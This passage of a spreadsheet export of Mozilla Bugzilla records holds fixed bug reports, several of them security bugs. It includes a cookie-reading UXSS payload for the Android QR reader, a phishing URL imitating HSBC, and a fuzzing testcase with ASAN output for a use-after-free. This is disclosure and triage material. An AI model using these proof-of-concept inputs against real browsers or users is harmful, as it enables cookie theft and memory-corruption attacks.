    #20 0x7fcef6d4c21f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:757:30
    #21 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14
    #22 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12
    #23 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&amp;, mozilla::ReflowOutput*, bool&amp;) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979
    #24 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3
    #25 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5
    #26 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
    #27 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
    #28 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
    #29 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #30 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, mozilla::ReflowInput&amp;, nsReflowStatus&amp;, mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
    #31 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7
    #32 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5
    #33 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
    #34 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #35 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #36 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46 in IsSimpleGlyph
Shadow bytes around the buggy address:
  0x0c22800dc380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c22800dc390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22800dc3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800dc3b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c22800dc3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c22800dc3d0: 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa
  0x0c22800dc3e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22800dc3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800dc400: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c22800dc410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c22800dc420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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04545==ABORTING</t>
        </is>
      </c>
      <c r="X4845" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4846">
      <c r="A4846" t="n">
        <v>1736886</v>
      </c>
      <c r="B4846" t="inlineStr">
        <is>
          <t>2021-10-20 11:14:45 -0700</t>
        </is>
      </c>
      <c r="C4846" t="inlineStr">
        <is>
          <t>uxss on qrcode code reader   (mozilla android version: 93.2.0 (Build #2015839747))</t>
        </is>
      </c>
      <c r="D4846" t="inlineStr">
        <is>
          <t>2024-05-30 10:49:59 -0700</t>
        </is>
      </c>
      <c r="E4846" t="n">
        <v>1</v>
      </c>
      <c r="F4846" t="n">
        <v>1</v>
      </c>
      <c r="G4846" t="n">
        <v>2</v>
      </c>
      <c r="H4846" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4846" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J4846" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4846" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4846" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4846" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4846" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main94+]</t>
        </is>
      </c>
      <c r="Q4846" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4846" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4846" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4846" t="n">
        <v>1</v>
      </c>
      <c r="U4846" t="n">
        <v>0</v>
      </c>
      <c r="V4846" t="n">
        <v>14</v>
      </c>
      <c r="W4846" t="inlineStr">
        <is>
          <t>Created attachment 9246920
uxssmozilla.mpeg
hello i found uxss on qr code reader (mozilla android version: 93.2.0 (Build #2015839747), using the payload:
javascript:alert(document.cookie) // :&lt;br&gt;
https://www.google.com
the user will be confused because the link will be shown below ( on permit dialog show ).  example "http://google.com". the user can see that the link is "https://google.com"
step to produced:
1.  go to https://goqr.me  (to create qr code).
2. insert text : 
javascript:alert(document.cookie) // :&lt;br&gt;
https://www.google.com
3. the qr code will be created
4. open mozilla on android
5. go to https://google.com
6 . scan the qr code.
7. click permit, the user will be confused because the link will be shown below.  example "http://google.com"
8.  then the xss will be executed,
i attached the poc video file.
thank you</t>
        </is>
      </c>
      <c r="X4846" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4847">
      <c r="A4847" t="n">
        <v>660453</v>
      </c>
      <c r="B4847" t="inlineStr">
        <is>
          <t>2011-05-28 08:01:53 -0700</t>
        </is>
      </c>
      <c r="C4847" t="inlineStr">
        <is>
          <t>Crash [@ txExecutionState::end]</t>
        </is>
      </c>
      <c r="D4847" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:47 -0700</t>
        </is>
      </c>
      <c r="E4847" t="n">
        <v>1</v>
      </c>
      <c r="F4847" t="n">
        <v>1</v>
      </c>
      <c r="G4847" t="n">
        <v>3</v>
      </c>
      <c r="H4847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4847" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4847" t="inlineStr">
        <is>
          <t>5 Branch</t>
        </is>
      </c>
      <c r="L4847" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4847" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4847" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4847" t="inlineStr">
        <is>
          <t>[sg:critical?],[qa-]</t>
        </is>
      </c>
      <c r="Q4847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4847" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4847" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4847" t="n">
        <v>1</v>
      </c>
      <c r="U4847" t="n">
        <v>0</v>
      </c>
      <c r="V4847" t="n">
        <v>42</v>
      </c>
      <c r="W4847" t="inlineStr">
        <is>
          <t>Created attachment 535858
crash report linux
1. http://nfomation.net/sitemap.xml
2. Crash after timing out
Windows XP and Linux 32bit beta so far.
One instance on Linux so far.
Operating system: Linux
                  0.0.0 Linux 2.6.35.13-91.fc14.i686.PAE #1 SMP Tue May 3 13:29:55 UTC 2011 i686
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  SIGSEGV
Crash address: 0x3db5
Thread 0 (crashed)
 0  libxul.so!txExecutionState::end [txExecutionState.cpp : 202 + 0x6]
    eip = 0x016edce2   esp = 0xbf9bc3a0   ebp = 0xbf9bc3c8   ebx = 0x03282054
    esi = 0x0a8198c0   edi = 0x014a0cf6   eax = 0x00003db5   ecx = 0x0a78c220
    edx = 0x00b2a3a0   efl = 0x00010246
    Found by: given as instruction pointer in context
 1  libxul.so!txMozillaXSLTProcessor::TransformToDoc [txMozillaXSLTProcessor.cpp : 718 + 0x14]
    eip = 0x017319ef   esp = 0xbf9bc3d0   ebp = 0xbf9bc5a8   ebx = 0x03282054
    esi = 0x0a8198c0   edi = 0x014a0cf6
    Found by: call frame info
 2  libxul.so!nsTransformBlockerEvent::Run [txMozillaXSLTProcessor.cpp : 595 + 0x25]
    eip = 0x01735e82   esp = 0xbf9bc5b0   ebp = 0xbf9bc5c8   ebx = 0x03282054
    esi = 0xbf9bc61c   edi = 0x00000000
    Found by: call frame info
 3  libxul.so!nsThread::ProcessNextEvent [nsThread.cpp : 618 + 0x16]
    eip = 0x0245a965   esp = 0xbf9bc5d0   ebp = 0xbf9bc658   ebx = 0x03282054
    esi = 0xbf9bc61c   edi = 0x00000000
    Found by: call frame info
 4  libxul.so!NS_ProcessNextEvent_P [nsThreadUtils.cpp : 250 + 0x1f]
    eip = 0x023ebabd   esp = 0xbf9bc660   ebp = 0xbf9bc698   ebx = 0x03282054
    esi = 0x00000001   edi = 0x0a00e018
    Found by: call frame info
 5  libxul.so!mozilla::ipc::MessagePump::Run [MessagePump.cpp : 110 + 0x15]
    eip = 0x022ca908   esp = 0xbf9bc6a0   ebp = 0xbf9bc6e8   ebx = 0x03282054
    esi = 0x00000001   edi = 0x0a00e018
    Found by: call frame info</t>
        </is>
      </c>
      <c r="X4847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4848">
      <c r="A4848" t="n">
        <v>796995</v>
      </c>
      <c r="B4848" t="inlineStr">
        <is>
          <t>2012-10-02 10:02:50 -0700</t>
        </is>
      </c>
      <c r="C4848" t="inlineStr">
        <is>
          <t>create mozilla-esr17 branch</t>
        </is>
      </c>
      <c r="D4848" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E4848" t="n">
        <v>1</v>
      </c>
      <c r="F4848" t="n">
        <v>1</v>
      </c>
      <c r="G4848" t="n">
        <v>5</v>
      </c>
      <c r="H4848" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4848" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4848" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4848" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4848" t="inlineStr">
        <is>
          <t>[TBD before 2012-11-16]</t>
        </is>
      </c>
      <c r="Q4848" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4848" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4848" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4848" t="n">
        <v>1</v>
      </c>
      <c r="U4848" t="n">
        <v>0</v>
      </c>
      <c r="V4848" t="n">
        <v>18</v>
      </c>
      <c r="W4848" t="inlineStr">
        <is>
          <t>Needs to be cloned off of mozilla-beta late in the cycle. We'll need build configs, test configs, initial release configs, etc. It's been awhile since we did a new branch set-up like this, these bugs should serve as a decent model:
https://bugzilla.mozilla.org/show_bug.cgi?id=717106
https://bugzilla.mozilla.org/show_bug.cgi?id=663820
Note that like mozilla-esr10, we don't separate l10n repos for them.</t>
        </is>
      </c>
      <c r="X4848" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4849">
      <c r="A4849" t="n">
        <v>1332993</v>
      </c>
      <c r="B4849" t="inlineStr">
        <is>
          <t>2017-01-22 23:11:33 -0800</t>
        </is>
      </c>
      <c r="C4849" t="inlineStr">
        <is>
          <t>Error logs written on profile fetch 304 response</t>
        </is>
      </c>
      <c r="D4849" t="inlineStr">
        <is>
          <t>2017-11-21 14:21:23 -0800</t>
        </is>
      </c>
      <c r="E4849" t="n">
        <v>1</v>
      </c>
      <c r="F4849" t="n">
        <v>1</v>
      </c>
      <c r="G4849" t="n">
        <v>2</v>
      </c>
      <c r="H4849" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4849" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4849" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K4849" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4849" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4849" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4849" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4849" t="inlineStr"/>
      <c r="Q4849" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4849" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4849" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T4849" t="n">
        <v>1</v>
      </c>
      <c r="U4849" t="n">
        <v>0</v>
      </c>
      <c r="V4849" t="n">
        <v>12</v>
      </c>
      <c r="W4849" t="inlineStr">
        <is>
          <t>I just saw the following in my logs:
&gt; 1485154464249   Services.Common.RESTRequest     DEBUG   GET https://profile.accounts.firefox.com/v1/profile 304
&gt; 1485154464250   FirefoxAccounts ERROR   Background refresh of profile failed, bumping _cachedAt: {"name":"FxAccountsProfileClientError","code":304,"errno":997,"error":"PARSE_ERROR","message":null}
&gt; 1485154464250   FirefoxAccounts ERROR   Background refresh of profile failed, bumping _cachedAt: {"name":"FxAccountsProfileClientError","code":304,"errno":997,"error":"PARSE_ERROR","message":null}
which seems bad :)
(see also bug 1332992, but I doubt that's related)</t>
        </is>
      </c>
      <c r="X4849" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4850">
      <c r="A4850" t="n">
        <v>653441</v>
      </c>
      <c r="B4850" t="inlineStr">
        <is>
          <t>2011-04-28 08:36:35 -0700</t>
        </is>
      </c>
      <c r="C4850" t="inlineStr">
        <is>
          <t>Fix ftpServer for preproduction</t>
        </is>
      </c>
      <c r="D4850" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4850" t="n">
        <v>1</v>
      </c>
      <c r="F4850" t="n">
        <v>1</v>
      </c>
      <c r="G4850" t="n">
        <v>5</v>
      </c>
      <c r="H4850" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4850" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4850" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4850" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4850" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4850" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4850" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4850" t="inlineStr">
        <is>
          <t>[preproduction][releases]</t>
        </is>
      </c>
      <c r="Q4850" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4850" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4850" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4850" t="n">
        <v>1</v>
      </c>
      <c r="U4850" t="n">
        <v>0</v>
      </c>
      <c r="V4850" t="n">
        <v>2</v>
      </c>
      <c r="W4850" t="inlineStr">
        <is>
          <t>Created attachment 528859
Fix ftpServer
ftpServer should point to preproduction-stage.build.mozilla.org in preproduction release emails.</t>
        </is>
      </c>
      <c r="X4850" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4851">
      <c r="A4851" t="n">
        <v>408164</v>
      </c>
      <c r="B4851" t="inlineStr">
        <is>
          <t>2007-12-13 01:57:12 -0800</t>
        </is>
      </c>
      <c r="C4851" t="inlineStr">
        <is>
          <t>Web forgery warning not shown until tab switch</t>
        </is>
      </c>
      <c r="D4851" t="inlineStr">
        <is>
          <t>2014-05-27 12:25:31 -0700</t>
        </is>
      </c>
      <c r="E4851" t="n">
        <v>1</v>
      </c>
      <c r="F4851" t="n">
        <v>1</v>
      </c>
      <c r="G4851" t="n">
        <v>3</v>
      </c>
      <c r="H4851" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4851" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4851" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K4851" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4851" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4851" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4851" t="inlineStr">
        <is>
          <t>[sg:low spoof] found in the wild</t>
        </is>
      </c>
      <c r="Q4851" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4851" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4851" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4851" t="n">
        <v>1</v>
      </c>
      <c r="U4851" t="n">
        <v>0</v>
      </c>
      <c r="V4851" t="n">
        <v>18</v>
      </c>
      <c r="W4851" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071205 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071205 Firefox/2.0.0.11
On URL provided the web forgery warning dialog doesn't show up unless I switch tab, and then switch back.
Reproducible: Always
Steps to Reproduce:
1. Open URL http://business-internet-banking.hsbc.com.hfye223.ph/bibauth/formStart/
2. Open new tab / switch tab
3. Switch back to first tab
Actual Results:  
Web forgery warning appears after step 3.
Expected Results:  
Web forgery warning should appear after step 1.
Tested on Firefox 2.0.0.11 in
Gentoo amd64
Ubuntu 7.10 amd64
Windows XP SP2
Mac OS X Leopard (10.5.1)</t>
        </is>
      </c>
      <c r="X4851" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4852">
      <c r="A4852" t="n">
        <v>358963</v>
      </c>
      <c r="B4852" t="inlineStr">
        <is>
          <t>2006-10-31 15:15:53 -0800</t>
        </is>
      </c>
      <c r="C4852" t="inlineStr">
        <is>
          <t>Write a guide for extension authors</t>
        </is>
      </c>
      <c r="D4852" t="inlineStr">
        <is>
          <t>2009-05-05 17:47:37 -0700</t>
        </is>
      </c>
      <c r="E4852" t="n">
        <v>1</v>
      </c>
      <c r="F4852" t="n">
        <v>1</v>
      </c>
      <c r="G4852" t="n">
        <v>4</v>
      </c>
      <c r="H4852" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4852" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4852" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K4852" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L4852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4852" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4852" t="inlineStr"/>
      <c r="Q4852" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4852" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4852" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4852" t="n">
        <v>1</v>
      </c>
      <c r="U4852" t="n">
        <v>0</v>
      </c>
      <c r="V4852" t="n">
        <v>2</v>
      </c>
      <c r="W4852" t="inlineStr">
        <is>
          <t>Bugzilla now has a lot of mechanisms for plugins:
1) Pluggable parameters
2) Template Hooks
3) Code Hooks
4) XML-RPC
We should have a short guide that explains where to get info on all of these, for people who want to write plugins.</t>
        </is>
      </c>
      <c r="X4852" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4853">
      <c r="A4853" t="n">
        <v>444260</v>
      </c>
      <c r="B4853" t="inlineStr">
        <is>
          <t>2008-07-08 20:34:04 -0700</t>
        </is>
      </c>
      <c r="C4853" t="inlineStr">
        <is>
          <t>Wide &lt;xul:button&gt; causes nsNativeThemeCocoa::DrawCellWithScaling to autorelease a freed object</t>
        </is>
      </c>
      <c r="D4853" t="inlineStr">
        <is>
          <t>2009-01-14 12:37:02 -0800</t>
        </is>
      </c>
      <c r="E4853" t="n">
        <v>1</v>
      </c>
      <c r="F4853" t="n">
        <v>1</v>
      </c>
      <c r="G4853" t="n">
        <v>3</v>
      </c>
      <c r="H4853" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4853" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4853" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K4853" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4853" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4853" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4853" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4853" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4853" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4853" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4853" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4853" t="n">
        <v>1</v>
      </c>
      <c r="U4853" t="n">
        <v>0</v>
      </c>
      <c r="V4853" t="n">
        <v>17</v>
      </c>
      <c r="W4853" t="inlineStr">
        <is>
          <t>Created attachment 328616
testcase (crashes Firefox when loaded)
Version: trunk debug build on Leopard
Loading the testcase causes a malloc error "can't allocate region" (perhaps bug 435223), and then:
objc[20992]: FREED(id): message autorelease sent to freed object=0x1ca0afe0
The malloc error doesn't bother me too much, but touching freed objects is pretty bad.  In fact, with MallocScribble enabled, Firefox dereferences 0x55555575 instead of triggering the error message above.</t>
        </is>
      </c>
      <c r="X4853" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4854">
      <c r="A4854" t="n">
        <v>1564449</v>
      </c>
      <c r="B4854" t="inlineStr">
        <is>
          <t>2019-07-09 07:55:21 -0700</t>
        </is>
      </c>
      <c r="C4854" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::VideoDocument::CreateVideoElement</t>
        </is>
      </c>
      <c r="D4854" t="inlineStr">
        <is>
          <t>2024-05-30 10:00:52 -0700</t>
        </is>
      </c>
      <c r="E4854" t="n">
        <v>1</v>
      </c>
      <c r="F4854" t="n">
        <v>1</v>
      </c>
      <c r="G4854" t="n">
        <v>3</v>
      </c>
      <c r="H4854" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4854" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4854" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4854" t="inlineStr">
        <is>
          <t>70 Branch</t>
        </is>
      </c>
      <c r="L4854" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4854" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4854" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4854" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+][adv-esr60.9+]</t>
        </is>
      </c>
      <c r="Q4854" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4854" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4854" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4854" t="n">
        <v>1</v>
      </c>
      <c r="U4854" t="n">
        <v>0</v>
      </c>
      <c r="V4854" t="n">
        <v>18</v>
      </c>
      <c r="W4854" t="inlineStr">
        <is>
          <t>Created attachment 9076822
test-encrypted-different-av-keys.webm
The following testcase crashes the latest ASAN build of Firefox 70.0a1 (BuildID=20190709034824). It requires a fuzzing build (--enable-fuzzing) and the pref `user_pref("fuzzing.enabled",true)`. I am using a Python2 webserver (`python -m SimpleHTTPServer`) to host the testcase. It requires the attached webm file in the same directory. It works most reliable when loaded in many tabs at the same time.
crash.html:
```
&lt;script&gt;
var fun1_called=0,fun2_called=0;
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","/post",false);
    x.send("X");
}
function start() {
	o10=new AudioContext();
	o15=window.open('test-encrypted-different-av-keys.webm','popup34'+Math.random(),'height=54,width=-5,centerscreen,outerWidth=12,status,scrollbars');
	o19=window.document;
    window.top.setTimeout(fun0, 4);
}
function fun0() {
	o15.addEventListener('DOMSubtreeModified',fun1);
}
function fun1() {
    if(window.top.fun1_called++)return;
    spin();
	o15.fun2=fun2;o15.eval("location.href='javascript:fun2(this,document,window)'");
    spin();
	o123=o19.createElement('frameset');
    try{o98.body=o123;}catch(e){}
    spin();
}
function fun2(othis, doc, t, count) {
    if(window.top.fun2_called++)return;
	window.top.o98=doc;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
```
ASAN output:
```
=================================================================
==12771==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00009e8e0 at pc 0x7f7ffe67f8e7 bp 0x7ffd585903b0 sp 0x7ffd585903a8
READ of size 8 at 0x60d00009e8e0 thread T0 (Web Content)
    #0 0x7f7ffe67f8e6 in AppendChildTo /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12
    #1 0x7f7ffe67f8e6 in mozilla::dom::VideoDocument::CreateVideoElement() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:135
